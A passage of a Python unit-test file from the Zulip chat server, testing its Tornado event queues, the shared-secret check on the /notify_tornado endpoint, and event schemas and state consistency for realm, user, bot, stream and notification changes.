from zerver.lib.test_classes import (
ZulipTestCase,
)
from zerver.lib.validator import (
check_bool, check_dict, check_int, check_list, check_string,
equals, check_none_or, Validator
)
from zerver.views.events_register import _default_all_public_streams, _default_narrow
from zerver.tornado.event_queue import allocate_client_descriptor, EventQueue
from zerver.tornado.views import get_events_backend
from collections import OrderedDict
import mock
import time
import ujson
from six.moves import range
class TornadoTest(ZulipTestCase):
    """Smoke test for the /notify_tornado endpoint."""
    def test_tornado_endpoint(self):
        # type: () -> None
        # This test is mostly intended to get minimal coverage on
        # the /notify_tornado endpoint, so we can have 100% URL coverage,
        # but it does exercise a little bit of the codepath.
        post_data = dict(
            data=ujson.dumps(
                dict(
                    event=dict(
                        type='other'
                    ),
                    users=[get_user_profile_by_email('hamlet@zulip.com').id],
                ),
            ),
        )
        # Without the shared secret the endpoint must refuse access.
        req = POSTRequestMock(post_data, user_profile=None)
        req.META['REMOTE_ADDR'] = '127.0.0.1'
        result = self.client_post_request('/notify_tornado', req)
        self.assert_json_error(result, 'Access denied', status_code=403)
        # With the secret supplied, the notification is accepted.
        post_data['secret'] = settings.SHARED_SECRET
        req = POSTRequestMock(post_data, user_profile=None)
        req.META['REMOTE_ADDR'] = '127.0.0.1'
        result = self.client_post_request('/notify_tornado', req)
        self.assert_json_success(result)
class GetEventsTest(ZulipTestCase):
    """Tests for the get_events_backend long-polling view, driven directly
    (not over HTTP) via mocked POST requests."""
    def tornado_call(self, view_func, user_profile, post_data):
        # type: (Callable[[HttpRequest, UserProfile], HttpResponse], UserProfile, Dict[str, Any]) -> HttpResponse
        """Invoke a Tornado view function directly with a mocked POST request."""
        request = POSTRequestMock(post_data, user_profile)
        return view_func(request, user_profile)
    def test_get_events(self):
        # type: () -> None
        """Send PMs and verify each side's event queue: the sender's events
        echo local_message_id, the recipient's events must not carry it."""
        email = "hamlet@zulip.com"
        recipient_email = "othello@zulip.com"
        user_profile = get_user_profile_by_email(email)
        recipient_user_profile = get_user_profile_by_email(recipient_email)
        self.login(email)
        # Register an event queue for the sender, restricted to message events.
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"apply_markdown": ujson.dumps(True),
                                    "event_types": ujson.dumps(["message"]),
                                    "user_client": "website",
                                    "dont_block": ujson.dumps(True),
                                    })
        self.assert_json_success(result)
        queue_id = ujson.loads(result.content)["queue_id"]
        # Register a second queue for the recipient.
        recipient_result = self.tornado_call(get_events_backend, recipient_user_profile,
                                             {"apply_markdown": ujson.dumps(True),
                                              "event_types": ujson.dumps(["message"]),
                                              "user_client": "website",
                                              "dont_block": ujson.dumps(True),
                                              })
        self.assert_json_success(recipient_result)
        recipient_queue_id = ujson.loads(recipient_result.content)["queue_id"]
        # Nothing has been sent yet, so the sender's queue is empty.
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"queue_id": queue_id,
                                    "user_client": "website",
                                    "last_event_id": -1,
                                    "dont_block": ujson.dumps(True),
                                    })
        events = ujson.loads(result.content)["events"]
        self.assert_json_success(result)
        self.assert_length(events, 0)
        # Send a PM tagged with a local id and the sender's queue id; the
        # sender's own queue should then echo local_message_id back.
        local_id = 10.01
        self.send_message(email, recipient_email, Recipient.PERSONAL, "hello", local_id=local_id, sender_queue_id=queue_id)
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"queue_id": queue_id,
                                    "user_client": "website",
                                    "last_event_id": -1,
                                    "dont_block": ujson.dumps(True),
                                    })
        events = ujson.loads(result.content)["events"]
        self.assert_json_success(result)
        self.assert_length(events, 1)
        self.assertEqual(events[0]["type"], "message")
        self.assertEqual(events[0]["message"]["sender_email"], email)
        self.assertEqual(events[0]["local_message_id"], local_id)
        self.assertEqual(events[0]["message"]["display_recipient"][0]["is_mirror_dummy"], False)
        self.assertEqual(events[0]["message"]["display_recipient"][1]["is_mirror_dummy"], False)
        # Send a second message and poll from the last seen event id; only
        # the new event should be returned.
        last_event_id = events[0]["id"]
        local_id += 0.01
        self.send_message(email, recipient_email, Recipient.PERSONAL, "hello", local_id=local_id, sender_queue_id=queue_id)
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"queue_id": queue_id,
                                    "user_client": "website",
                                    "last_event_id": last_event_id,
                                    "dont_block": ujson.dumps(True),
                                    })
        events = ujson.loads(result.content)["events"]
        self.assert_json_success(result)
        self.assert_length(events, 1)
        self.assertEqual(events[0]["type"], "message")
        self.assertEqual(events[0]["message"]["sender_email"], email)
        self.assertEqual(events[0]["local_message_id"], local_id)
        # Test that the received message in the receiver's event queue
        # exists and does not contain a local id
        recipient_result = self.tornado_call(get_events_backend, recipient_user_profile,
                                             {"queue_id": recipient_queue_id,
                                              "user_client": "website",
                                              "last_event_id": -1,
                                              "dont_block": ujson.dumps(True),
                                              })
        recipient_events = ujson.loads(recipient_result.content)["events"]
        self.assert_json_success(recipient_result)
        self.assertEqual(len(recipient_events), 2)
        self.assertEqual(recipient_events[0]["type"], "message")
        self.assertEqual(recipient_events[0]["message"]["sender_email"], email)
        self.assertTrue("local_message_id" not in recipient_events[0])
        self.assertEqual(recipient_events[1]["type"], "message")
        self.assertEqual(recipient_events[1]["message"]["sender_email"], email)
        self.assertTrue("local_message_id" not in recipient_events[1])
    def test_get_events_narrow(self):
        # type: () -> None
        """A queue narrowed to a stream only receives events for messages
        matching that narrow (the PM below must be filtered out)."""
        email = "hamlet@zulip.com"
        user_profile = get_user_profile_by_email(email)
        self.login(email)
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"apply_markdown": ujson.dumps(True),
                                    "event_types": ujson.dumps(["message"]),
                                    "narrow": ujson.dumps([["stream", "denmark"]]),
                                    "user_client": "website",
                                    "dont_block": ujson.dumps(True),
                                    })
        self.assert_json_success(result)
        queue_id = ujson.loads(result.content)["queue_id"]
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"queue_id": queue_id,
                                    "user_client": "website",
                                    "last_event_id": -1,
                                    "dont_block": ujson.dumps(True),
                                    })
        events = ujson.loads(result.content)["events"]
        self.assert_json_success(result)
        self.assert_length(events, 0)
        # One PM (filtered out by the narrow) and one stream message (kept).
        self.send_message(email, "othello@zulip.com", Recipient.PERSONAL, "hello")
        self.send_message(email, "Denmark", Recipient.STREAM, "hello")
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"queue_id": queue_id,
                                    "user_client": "website",
                                    "last_event_id": -1,
                                    "dont_block": ujson.dumps(True),
                                    })
        events = ujson.loads(result.content)["events"]
        self.assert_json_success(result)
        self.assert_length(events, 1)
        self.assertEqual(events[0]["type"], "message")
        self.assertEqual(events[0]["message"]["display_recipient"], "Denmark")
class EventsRegisterTest(ZulipTestCase):
    """End-to-end consistency tests for the events system.

    For each action, do_test() verifies two things:
    (1) the events generated by the action match an explicit schema, and
    (2) applying those events to a pre-action fetch_initial_state_data()
        snapshot yields the same state as a fresh post-action fetch.
    """
    # NOTE(review): these lookups run once at module import time, so all
    # test methods share the same profile objects from the test fixtures.
    user_profile = get_user_profile_by_email("hamlet@zulip.com")
    bot = get_user_profile_by_email("welcome-bot@zulip.com")
    maxDiff = None # type: Optional[int]

    def create_bot(self, email):
        # type: (str) -> UserProfile
        """Create a default bot owned by self.user_profile."""
        return do_create_user(email, '123',
                              get_realm('zulip'), 'Test Bot', 'test',
                              bot_type=UserProfile.DEFAULT_BOT, bot_owner=self.user_profile)

    def realm_bot_schema(self, field_name, check):
        # type: (str, Validator) -> Validator
        """Build a validator for a realm_bot/update event that changes
        `field_name`, validated by `check`."""
        return check_dict([
            ('type', equals('realm_bot')),
            ('op', equals('update')),
            ('bot', check_dict([
                ('email', check_string),
                ('user_id', check_int),
                (field_name, check),
            ])),
        ])

    def do_test(self, action, event_types=None):
        # type: (Callable[[], Any], Optional[List[str]]) -> List[Dict[str, Any]]
        """Run `action`, capture the events it generated in a fresh client
        queue, check state consistency, and return the events.

        Raises an assertion failure if the action generated no events or
        if the hybrid (fetch + apply_events) state diverges from a fresh
        post-action fetch.
        """
        client = allocate_client_descriptor(
            dict(user_profile_id = self.user_profile.id,
                 user_profile_email = self.user_profile.email,
                 realm_id = self.user_profile.realm_id,
                 event_types = event_types,
                 client_type_name = "website",
                 apply_markdown = True,
                 all_public_streams = False,
                 queue_timeout = 600,
                 last_connection_time = time.time(),
                 narrow = [])
        )
        # hybrid_state = initial fetch state + re-applying events triggered by our action
        # normal_state = do action then fetch at the end (the "normal" code path)
        hybrid_state = fetch_initial_state_data(self.user_profile, event_types, "")
        action()
        events = client.event_queue.contents()
        self.assertTrue(len(events) > 0)
        apply_events(hybrid_state, events, self.user_profile)
        normal_state = fetch_initial_state_data(self.user_profile, event_types, "")
        self.match_states(hybrid_state, normal_state)
        return events

    def assert_on_error(self, error):
        # type: (str) -> None
        """Fail the test with the validator's error message, if any."""
        if error:
            raise AssertionError(error)

    def match_states(self, state1, state2):
        # type: (Dict[str, Any], Dict[str, Any]) -> None
        """Assert two state dicts are equal, after normalizing the
        order-sensitive list fields into dicts keyed by email/name."""
        def normalize(state):
            # type: (Dict[str, Any]) -> None
            state['realm_users'] = {u['email']: u for u in state['realm_users']}
            for u in state['subscriptions']:
                u['subscribers'].sort()
            state['subscriptions'] = {u['name']: u for u in state['subscriptions']}
            state['unsubscribed'] = {u['name']: u for u in state['unsubscribed']}
            if 'realm_bots' in state:
                state['realm_bots'] = {u['email']: u for u in state['realm_bots']}
        normalize(state1)
        normalize(state2)
        self.assertEqual(state1, state2)

    def test_send_message_events(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('message')),
            ('flags', check_list(None)),
            ('message', check_dict([
                ('avatar_url', check_string),
                ('client', check_string),
                ('content', check_string),
                ('content_type', equals('text/html')),
                ('display_recipient', check_string),
                ('gravatar_hash', check_string),
                ('id', check_int),
                ('recipient_id', check_int),
                ('sender_domain', check_string),
                ('sender_email', check_string),
                ('sender_full_name', check_string),
                ('sender_id', check_int),
                ('sender_short_name', check_string),
                ('subject', check_string),
                ('subject_links', check_list(None)),
                ('timestamp', check_int),
                ('type', check_string),
            ])),
        ])
        events = self.do_test(lambda: self.send_message("hamlet@zulip.com", "Verona", Recipient.STREAM, "hello"))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)
        schema_checker = check_dict([
            ('type', equals('update_message')),
            ('flags', check_list(None)),
            ('content', check_string),
            ('edit_timestamp', check_int),
            ('message_id', check_int),
            ('message_ids', check_list(check_int)),
            ('orig_content', check_string),
            ('orig_rendered_content', check_string),
            ('orig_subject', check_string),
            ('propagate_mode', check_string),
            ('rendered_content', check_string),
            ('sender', check_string),
            ('stream_id', check_int),
            ('subject', check_string),
            ('subject_links', check_list(None)),
            # There is also a timestamp field in the event, but we ignore it, as
            # it's kind of an unwanted but harmless side effect of calling log_event.
        ])
        message = Message.objects.order_by('-id')[0]
        topic = 'new_topic'
        propagate_mode = 'change_all'
        content = 'new content'
        rendered_content = render_markdown(message, content)
        events = self.do_test(lambda: do_update_message(self.user_profile, message, topic, propagate_mode, content, rendered_content))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_pointer_events(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('pointer')),
            ('pointer', check_int)
        ])
        events = self.do_test(lambda: do_update_pointer(self.user_profile, 1500))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_register_events(self):
        # type: () -> None
        realm_user_add_checker = check_dict([
            ('type', equals('realm_user')),
            ('op', equals('add')),
            ('person', check_dict([
                ('email', check_string),
                ('full_name', check_string),
                ('is_admin', check_bool),
                ('is_bot', check_bool),
            ])),
        ])
        stream_create_checker = check_dict([
            ('type', equals('stream')),
            ('op', equals('create')),
            ('streams', check_list(check_dict([
                ('description', check_string),
                ('invite_only', check_bool),
                ('name', check_string),
                ('stream_id', check_int),
            ])))
        ])
        events = self.do_test(lambda: self.register("test1@zulip.com", "test1"))
        error = realm_user_add_checker('events[0]', events[0])
        self.assert_on_error(error)
        error = stream_create_checker('events[1]', events[1])
        self.assert_on_error(error)

    def test_alert_words_events(self):
        # type: () -> None
        alert_words_checker = check_dict([
            ('type', equals('alert_words')),
            ('alert_words', check_list(check_string)),
        ])
        events = self.do_test(lambda: do_add_alert_words(self.user_profile, ["alert_word"]))
        error = alert_words_checker('events[0]', events[0])
        self.assert_on_error(error)
        events = self.do_test(lambda: do_remove_alert_words(self.user_profile, ["alert_word"]))
        error = alert_words_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_default_streams_events(self):
        # type: () -> None
        default_streams_checker = check_dict([
            ('type', equals('default_streams')),
            ('default_streams', check_list(check_dict([
                ('description', check_string),
                ('invite_only', check_bool),
                ('name', check_string),
                ('stream_id', check_int),
            ]))),
        ])
        events = self.do_test(lambda: do_add_default_stream(self.user_profile.realm, "Scotland"))
        error = default_streams_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_muted_topics_events(self):
        # type: () -> None
        muted_topics_checker = check_dict([
            ('type', equals('muted_topics')),
            ('muted_topics', check_list(check_list(check_string, 2))),
        ])
        events = self.do_test(lambda: do_set_muted_topics(self.user_profile, [[u"Denmark", u"topic"]]))
        error = muted_topics_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_full_name(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm_user')),
            ('op', equals('update')),
            ('person', check_dict([
                ('email', check_string),
                ('full_name', check_string),
            ])),
        ])
        events = self.do_test(lambda: do_change_full_name(self.user_profile, 'Sir Hamlet'))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_realm_name(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('name')),
            ('value', check_string),
        ])
        events = self.do_test(lambda: do_set_realm_name(self.user_profile.realm, 'New Realm Name'))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_realm_restricted_to_domain(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('restricted_to_domain')),
            ('value', check_bool),
        ])
        # The first True is probably a noop, then we get transitions in both directions.
        for restricted_to_domain in (True, False, True):
            events = self.do_test(lambda: do_set_realm_restricted_to_domain(self.user_profile.realm, restricted_to_domain))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_realm_invite_required(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('invite_required')),
            ('value', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for invite_required in (False, True, False):
            events = self.do_test(lambda: do_set_realm_invite_required(self.user_profile.realm, invite_required))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_realm_authentication_methods(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update_dict')),
            ('property', equals('default')),
            ('data', check_dict([])),
        ])
        # Test transitions; any new backends should be tested with T/T/T/F/T
        for (auth_method_dict) in \
                ({'Google': True, 'Email': True, 'GitHub': True, 'LDAP': False, 'Dev': False},
                 {'Google': True, 'Email': True, 'GitHub': False, 'LDAP': False, 'Dev': False},
                 {'Google': True, 'Email': False, 'GitHub': False, 'LDAP': False, 'Dev': False},
                 {'Google': True, 'Email': False, 'GitHub': True, 'LDAP': False, 'Dev': False},
                 {'Google': False, 'Email': False, 'GitHub': False, 'LDAP': False, 'Dev': True},
                 {'Google': False, 'Email': False, 'GitHub': True, 'LDAP': False, 'Dev': True},
                 {'Google': False, 'Email': True, 'GitHub': True, 'LDAP': True, 'Dev': False}):
            events = self.do_test(lambda: do_set_realm_authentication_methods(self.user_profile.realm,
                                                                              auth_method_dict))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_realm_invite_by_admins_only(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('invite_by_admins_only')),
            ('value', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for invite_by_admins_only in (False, True, False):
            events = self.do_test(lambda: do_set_realm_invite_by_admins_only(self.user_profile.realm, invite_by_admins_only))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_realm_default_language(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('default_language')),
            ('value', check_string),
        ])
        events = self.do_test(lambda: do_set_realm_default_language(self.user_profile.realm, 'de'))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_realm_create_stream_by_admins_only(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('create_stream_by_admins_only')),
            ('value', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for create_stream_by_admins_only in (False, True, False):
            events = self.do_test(lambda: do_set_realm_create_stream_by_admins_only(self.user_profile.realm,
                                                                                    create_stream_by_admins_only))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_pin_stream(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('update')),
            ('property', equals('pin_to_top')),
            ('value', check_bool),
        ])
        stream = "Denmark"
        sub = get_subscription(stream, self.user_profile)
        # The first False is probably a noop, then we get transitions in both directions.
        for pinned in (False, True, False):
            events = self.do_test(lambda: do_change_subscription_property(self.user_profile, sub, stream, "pin_to_top", pinned))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_realm_message_edit_settings(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update_dict')),
            ('property', equals('default')),
            ('data', check_dict([('allow_message_editing', check_bool),
                                 ('message_content_edit_limit_seconds', check_int)])),
        ])
        # Test every transition among the four possibilities {T,F} x {0, non-0}
        for (allow_message_editing, message_content_edit_limit_seconds) in \
                ((True, 0), (False, 0), (True, 0), (False, 1234), (True, 0), (True, 1234), (True, 0),
                 (False, 0), (False, 1234), (False, 0), (True, 1234), (False, 0),
                 (True, 1234), (True, 600), (False, 600), (False, 1234), (True, 600)):
            events = self.do_test(lambda: do_set_realm_message_editing(self.user_profile.realm,
                                                                      allow_message_editing, message_content_edit_limit_seconds))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_is_admin(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm_user')),
            ('op', equals('update')),
            ('person', check_dict([
                ('email', check_string),
                ('is_admin', check_bool),
            ])),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for is_admin in [False, True, False]:
            events = self.do_test(lambda: do_change_is_admin(self.user_profile, is_admin))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_twenty_four_hour_time(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_display_settings')),
            ('setting_name', equals('twenty_four_hour_time')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_twenty_four_hour_time(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_left_side_userlist(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_display_settings')),
            ('setting_name', equals('left_side_userlist')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_left_side_userlist(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_enable_stream_desktop_notifications(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_global_notifications')),
            ('notification_name', equals('enable_stream_desktop_notifications')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_enable_stream_desktop_notifications(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_enable_stream_sounds(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_global_notifications')),
            ('notification_name', equals('enable_stream_sounds')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_enable_stream_sounds(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_enable_desktop_notifications(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_global_notifications')),
            ('notification_name', equals('enable_desktop_notifications')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_enable_desktop_notifications(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_enable_sounds(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_global_notifications')),
            ('notification_name', equals('enable_sounds')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_enable_sounds(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_enable_offline_email_notifications(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_global_notifications')),
            ('notification_name', equals('enable_offline_email_notifications')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_enable_offline_email_notifications(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_enable_offline_push_notifications(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_global_notifications')),
            ('notification_name', equals('enable_offline_push_notifications')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_enable_offline_push_notifications(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_enable_online_push_notifications(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_global_notifications')),
            ('notification_name', equals('enable_online_push_notifications')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_enable_online_push_notifications(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_pm_content_in_desktop_notifications(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_global_notifications')),
            ('notification_name', equals('pm_content_in_desktop_notifications')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_pm_content_in_desktop_notifications(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_enable_digest_emails(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_global_notifications')),
            ('notification_name', equals('enable_digest_emails')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_enable_digest_emails(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_realm_emoji_events(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm_emoji')),
            ('op', equals('update')),
            ('realm_emoji', check_dict([])),
        ])
        events = self.do_test(lambda: check_add_realm_emoji(get_realm("zulip"), "my_emoji",
                                                            "https://realm.com/my_emoji"))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)
        events = self.do_test(lambda: do_remove_realm_emoji(get_realm("zulip"), "my_emoji"))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_realm_filter_events(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm_filters')),
            ('realm_filters', check_list(None)), # TODO: validate tuples in the list
        ])
        events = self.do_test(lambda: do_add_realm_filter(get_realm("zulip"), "#(?P<id>[123])",
                                                          "https://realm.com/my_realm_filter/%(id)s"))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)
        # Fix: the return value was previously discarded here, so the
        # schema check below silently re-validated the stale events from
        # the do_add_realm_filter call instead of the remove events.
        events = self.do_test(lambda: do_remove_realm_filter(get_realm("zulip"), "#(?P<id>[123])"))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_realm_alias_events(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm_domains')),
            ('op', equals('add')),
            ('alias', check_dict([
                ('id', check_int),
                ('domain', check_string),
            ])),
        ])
        realm = get_realm('zulip')
        events = self.do_test(lambda: do_add_realm_alias(realm, 'zulip.org'))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)
        schema_checker = check_dict([
            ('type', equals('realm_domains')),
            ('op', equals('remove')),
            ('alias_id', check_int),
        ])
        alias_id = RealmAlias.objects.get(realm=realm, domain='zulip.org').id
        events = self.do_test(lambda: do_remove_realm_alias(realm, alias_id))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_create_bot(self):
        # type: () -> None
        bot_created_checker = check_dict([
            ('type', equals('realm_bot')),
            ('op', equals('add')),
            ('bot', check_dict([
                ('email', check_string),
                ('user_id', check_int),
                ('full_name', check_string),
                ('api_key', check_string),
                ('default_sending_stream', check_none_or(check_string)),
                ('default_events_register_stream', check_none_or(check_string)),
                ('default_all_public_streams', check_bool),
                ('avatar_url', check_string),
            ])),
        ])
        action = lambda: self.create_bot('test-bot@zulip.com')
        events = self.do_test(action)
        # events[0] is the realm_user add event; events[1] is realm_bot add.
        error = bot_created_checker('events[1]', events[1])
        self.assert_on_error(error)

    def test_change_bot_full_name(self):
        # type: () -> None
        action = lambda: do_change_full_name(self.bot, 'New Bot Name')
        events = self.do_test(action)
        error = self.realm_bot_schema('full_name', check_string)('events[1]', events[1])
        self.assert_on_error(error)

    def test_regenerate_bot_api_key(self):
        # type: () -> None
        action = lambda: do_regenerate_api_key(self.bot)
        events = self.do_test(action)
        error = self.realm_bot_schema('api_key', check_string)('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_bot_avatar_source(self):
        # type: () -> None
        action = lambda: do_change_avatar_source(self.bot, self.bot.AVATAR_FROM_USER)
        events = self.do_test(action)
        error = self.realm_bot_schema('avatar_url', check_string)('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_bot_default_all_public_streams(self):
        # type: () -> None
        action = lambda: do_change_default_all_public_streams(self.bot, True)
        events = self.do_test(action)
        error = self.realm_bot_schema('default_all_public_streams', check_bool)('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_bot_default_sending_stream(self):
        # type: () -> None
        stream = get_stream("Rome", self.bot.realm)
        action = lambda: do_change_default_sending_stream(self.bot, stream)
        events = self.do_test(action)
        error = self.realm_bot_schema('default_sending_stream', check_string)('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_bot_default_events_register_stream(self):
        # type: () -> None
        stream = get_stream("Rome", self.bot.realm)
        action = lambda: do_change_default_events_register_stream(self.bot, stream)
        events = self.do_test(action)
        error = self.realm_bot_schema('default_events_register_stream', check_string)('events[0]', events[0])
        self.assert_on_error(error)

    def test_do_deactivate_user(self):
        # type: () -> None
        bot_deactivate_checker = check_dict([
            ('type', equals('realm_bot')),
            ('op', equals('remove')),
            ('bot', check_dict([
                ('email', check_string),
                ('full_name', check_string),
            ])),
        ])
        bot = self.create_bot('foo-bot@zulip.com')
        action = lambda: do_deactivate_user(bot)
        events = self.do_test(action)
        error = bot_deactivate_checker('events[1]', events[1])
        self.assert_on_error(error)

    def test_rename_stream(self):
        # type: () -> None
        realm = get_realm('zulip')
        stream = self.make_stream('old_name')
        new_name = u'stream with a brand new name'
        self.subscribe_to_stream(self.user_profile.email, stream.name)
        action = lambda: do_rename_stream(realm, stream.name, new_name)
        events = self.do_test(action)
        # A rename generates an email_address update followed by the name update.
        schema_checker = check_dict([
            ('type', equals('stream')),
            ('op', equals('update')),
            ('property', equals('email_address')),
            ('value', check_string),
            ('name', equals('old_name')),
        ])
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)
        schema_checker = check_dict([
            ('type', equals('stream')),
            ('op', equals('update')),
            ('property', equals('name')),
            ('value', equals(new_name)),
            ('name', equals('old_name')),
        ])
        error = schema_checker('events[1]', events[1])
        self.assert_on_error(error)

    def test_deactivate_stream_neversubscribed(self):
        # type: () -> None
        stream = self.make_stream('old_name')
        action = lambda: do_deactivate_stream(stream)
        events = self.do_test(action)
        schema_checker = check_dict([
            ('type', equals('stream')),
            ('op', equals('delete')),
            ('streams', check_list(check_dict([]))),
        ])
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_subscribe_other_user_never_subscribed(self):
        # type: () -> None
        action = lambda: self.subscribe_to_stream("othello@zulip.com", u"test_stream")
        events = self.do_test(action)
        schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('peer_add')),
            ('user_id', check_int),
            ('subscriptions', check_list(check_string)),
        ])
        error = schema_checker('events[2]', events[2])
        self.assert_on_error(error)

    def test_subscribe_events(self):
        # type: () -> None
        subscription_schema_checker = check_list(
            check_dict([
                ('color', check_string),
                ('description', check_string),
                ('email_address', check_string),
                ('invite_only', check_bool),
                ('in_home_view', check_bool),
                ('name', check_string),
                ('desktop_notifications', check_bool),
                ('audible_notifications', check_bool),
